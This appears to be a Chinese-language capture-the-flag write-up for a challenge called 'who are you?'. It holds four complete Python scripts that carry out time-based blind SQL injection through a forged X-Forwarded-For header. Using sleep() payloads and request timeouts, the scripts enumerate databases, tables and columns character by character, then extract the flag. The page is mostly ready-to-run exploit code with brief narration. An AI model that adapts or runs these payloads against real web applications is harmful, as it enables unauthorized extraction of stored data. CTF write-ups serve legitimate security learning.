who are you?
這道題點開看見your ip is :xxx.xxx.xx.xxx
然後試了巨久改ip,改了一堆了還是撤都沒有
然後看了大佬的wp的說是時間盲注,試了一下,確實有延遲,然後就用腳本進行時間盲注了
爆數據庫
#-*-coding:utf-8-*-
#暴力數據庫
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
database = []
print('start.')
for database_number in range(0,100): #爆破前100個庫
database_name =''
for i in range(1,100): #字符串長度最多爲100
flag = 0
for str in guess: #爆破該位置的字符
headers = {
"X-Forwarded-For":"'+"+"(select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)
}
try:
res = requests.get(url,headers=headers,timeout=4)
except:
database_name+=str
flag = 1
print('scaning no.%d database.'%(database_number+1),database_name)
break
if flag==0:
break
database.append(database_name)
if i==1 and flag==0:
print('finished.')
break
for i in range(len(database)):
print(database[i])
然後就能看到有什麼數據庫了
爆數據表
這裏前面是爆了43個數據庫,然後我們猜測是在最後一個數據庫
貼波腳本
#-*- coding:utf-8-*-
#暴力數據表
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
tables = []
print('start')
for table_number in range(41,43):
tablename = ""
for i in range(1,100):
flag = 0
for str in guess:
headers={
"X-Forwarded-For":"'+"+"(select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)
}
try:
res = requests.get(url,headers=headers,timeout=4)
except:
tablename+=str
flag=1
print('scaning no.%d database '%(table_number+1),tablename)
break
if flag==0:
break
tables.append(tablename)
if i==1 and flag==0:
print('finished.')
break
for i in range(len(tables)):
print(tables[i])
就可以看見最後一個數據庫裏面有個flag表
接着爆字項,這個也是前面掃了一下有485個列,也是去掃一下最後一列
# -*- coding:utf-8 -*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
columns=[]
for column_number in range(484,485): #爆破後面的
cloumnname=''
for i in range(1,100): #爆破字符串長度不超過100
flag=0
for str in guess: #爆破該位置的字符
headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
cloumnname+=str
flag=1
print('scaning the no.%d column '%(column_number+1) ,cloumnname)
break
if flag==0:
break
columns.append(cloumnname)
if i==1 and flag==0:
print('finished.')
break
for i in range(len(columns)):
print(columns[i])
可以看到最後一列是有flag的,最後就是暴力出它的值就行了
#-*-coding:utf-8-*-
import requests
import string
url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess=string.ascii_lowercase + string.ascii_uppercase + string.digits
flag=""
for i in range(1,100):
biaoji=0
for str in guess:
headers={"X-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}
try:
res=requests.get(url,headers=headers,timeout=6)
except(requests.exceptions.ReadTimeout):
biaoji=1
flag = flag + str
print( "flag:", flag)
break
if biaoji==0:
break
print( 'result:' + flag)
這樣就出來flag了
這個掃出來是真的慢,等到我從一條鹹魚都發黴變成了黴香鹹魚了...............